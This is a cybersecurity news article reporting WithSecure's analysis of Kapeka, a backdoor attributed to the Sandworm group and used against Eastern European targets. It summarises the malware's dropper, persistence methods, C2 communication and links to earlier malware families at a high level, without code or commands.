Kapeka, a “flexible” backdoor that had not been disclosed before, has been “sporadically” spotted in cyber operations that have targeted Eastern European countries, including Estonia and Ukraine, from at least the middle of the year 2022.
The results were discovered by WithSecure, a cybersecurity company based in Finland. The company identified the malware as belonging to the advanced persistent threat (APT) group known as Sandworm, which is also known as APT44 or Seashell Blizzard. KnuckleTouch is the term that Microsoft is using to track down the same malicious software.
“The malware […] is a flexible backdoor with all the necessary functionalities to serve as an early-stage toolkit for its operators, and also to provide long-term access to the victim estate,” said Mohammad Kazem Hassan Nejad, a security researcher. “The malware is also designed to provide prolonged access to the victim estate.”
The dropper that Kapeka comes equipped with is designed to launch and execute a backdoor component on the host that has been infected, and then it will uninstall itself after it has completed its mission. If the process in question possesses SYSTEM rights, the dropper is also accountable for establishing persistence for the backdoor. This can be done in the form of a scheduled job or an autorun registry, depending on the circumstances.
In its own advisory that was published in February 2024, Microsoft described Kapeka as being involved in multiple campaigns that distributed ransomware. It also stated that Kapeka can be used to carry out a variety of functions, including the theft of credentials and other data, the execution of destructive attacks, and the provision of remote access to the device by threat actors.
The backdoor is a Windows dynamic link library (DLL) that was built in C++. It has an embedded command-and-control (C2) configuration that is used to establish communication with an actor-controlled server. Additionally, it stores information regarding the frequency at which the server needs to be polled in order to collect commands.
In addition to disguising itself as a Microsoft Word add-in in order to give the impression that it is authentic, the backdoor DLL collects data regarding the compromised host and uses multi-threading in order to get incoming instructions, execute them, and then send the results of the execution to the C2 server.
“The backdoor uses WinHttp 5.1 COM interface (winhttpcom.dll) to implement its network communication component,” Nejad described in detail. A communication is established between the backdoor and its C2 in order to poll for tasks and to transmit back fingerprinted information as well as the results of the tasks. Sending and receiving information from its C2 is accomplished through the use of JSON by the backdoor.
A new version of the C2 configuration can be obtained from the C2 server while the implant is polling, which allows the implant to update its C2 configuration on the fly. For example, the backdoor has the capability to read and write files from and to disk, launch payloads, execute shell commands, and even upgrade and uninstall itself. These are just some of the primary functions that it possesses.
At this point in time, information regarding the specific mechanism by which the malware is spread is not known. On the other hand, Microsoft pointed out that the dropper is obtained from websites that have been compromised by utilizing the certutil program. This highlights the fact that a valid living-off-the-land binary (LOLBin) was utilized in order to orchestrate the security breach.
Kapeka’s connections to Sandworm are based on conceptual and configuration overlaps with families that have been released in the past, such as GreyEnergy and Prestige, which are expected to be the successors to the BlackEnergy toolkit.
“It is likely that Kapeka was used in intrusions that led to the deployment of Prestige ransomware in late 2022,” according to WithSecure. “It is probable that Kapeka is a successor to GreyEnergy, which itself was likely a replacement for BlackEnergy in Sandworm’s arsenal.”
“The backdoor’s victimology, infrequent sightings, and level of stealth and sophistication indicate APT-level activity, highly likely of Russian origin.”